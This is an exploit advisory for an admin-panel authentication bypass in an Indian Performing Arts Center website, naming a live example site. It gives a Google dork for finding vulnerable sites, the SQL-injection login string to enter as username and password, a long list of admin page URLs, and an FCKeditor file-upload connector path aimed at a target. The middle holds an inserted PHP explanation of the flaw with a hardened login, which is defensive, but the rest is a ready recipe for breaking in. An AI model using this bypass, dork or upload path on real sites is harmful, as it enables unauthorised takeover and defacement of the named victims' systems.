#################################################################################################
# Exploit Title : Copyright © 2014 Indian Performing Art Center Admin Control Panel Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 08/06/2018
# Vendor Homepage : ipacglobal.com
# Social Media Page : facebook.com/India-Performing-Arts-Center-249492318418992/
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]
#       CWE-288 [ Authentication Bypass Using an Alternate Path or Channel ]
#       CWE-592 [ Authentication Bypass Issues ]
#################################################################################################
# Google Dork : intext:''Copyright © 2014- All Rights Reserved Press| Indian Performing Art Center ::''
# Admin Panel Login Path : /admin
# Exploit : Enter the same string as both the admin username and the password => '=''or'
# Possible Usable Admin Control Panel URL Paths :
/admin/editpages.php
/admin/editpages.php?id=1
/admin/editpages.php?id=2
/admin/editpages.php?id=3
/admin/editpages.php?id=4
/admin/editpages.php?id=5
/admin/editpages.php?id=6
/admin/editpages.php?id=7
/admin/editpages.php?id=8
/admin/editpages.php?id=9
/admin/editpages.php?id=10
/admin/editpages.php?id=11
/admin/editpages.php?id=12
/admin/addcategory.php
/admin/gallery.php?g_id=1
/admin/gallery.php?g_id=13
/admin/gallery.php?g_id=14
/admin/event.php
/admin/event.php?addcat=addcat
/admin/event.php?edit=edit&catid=1
/admin/videos.php
/admin/videos.php?addcat=addcat
/admin/videos.php?edit=edit&catid=1
/admin/fogana.php
/admin/fogana.php?edit=edit&fogana=1
/admin/addtestmoni.php
/admin/testimonials.php?edit=edit&catid=9
Add Image =>
/admin/addimage.php?action=add&g_id=1
Edit Image with Height and Width
/admin/edit.php?g_id=1&action=del&pid=1&height=200&width=350
PATH => /products/flash/....
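The login string above only works where the application pastes form input into its SQL text. The following is an added example, not the vendor's code (which does not appear on this page), showing that assumed pattern beside a hardened login and a per-page session guard. The `admins` table, its columns, the function names and the MySQL backend are assumptions.

```php
<?php
// Added example, not the vendor's code. The admins table, its columns and the
// MySQL backend are assumptions; the site's real source is not on this page.

// Assumed vulnerable pattern: form input concatenated into the SQL text.
function legacy_login_sql(string $user, string $pass): string
{
    return "SELECT id FROM admins WHERE username='$user' AND password='$pass'";
}
// With the advisory's string in both fields the WHERE clause becomes
//   username=''=''or'' AND password=''=''or''
// The input's quotes end the literal, so the rest is parsed as operators.
// For any non-empty username MySQL reads (username='')='' as 0='' and
// coerces '' to 0, so the condition is TRUE for every row.

// Hardened form: input is bound as data and the password is checked against
// a hash (password_hash column assumed to hold password_hash() output).
function admin_login(PDO $pdo, string $user, string $pass): bool
{
    $stmt = $pdo->prepare('SELECT id, password_hash FROM admins WHERE username = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Unknown user and wrong password are rejected the same way.
    if ($row === false || !password_verify($pass, $row['password_hash'])) {
        return false;
    }
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    session_regenerate_id(true); // fresh session id once privileges change
    $_SESSION['admin_id'] = (int) $row['id'];
    return true;
}

// Guard for the top of every script under /admin (editpages.php, gallery.php,
// event.php, ...), so no page renders without an authenticated session.
function require_admin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['admin_id'])) {
        http_response_code(403);
        exit('Forbidden');
    }
}
```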
#################################################################################################
# FCKeditor Vulnerability [ Selectable types : File ~ Image ~ Flash ~ Media ]
/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http.//TARGETSITE/admin/fckeditor/editor/filemanager/connectors/php/Fconnector.php
PATH => /admin/images/image/.....
PATH => /admin/images/file/....
#################################################################################################
# Example Site => ipacglobal.com
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################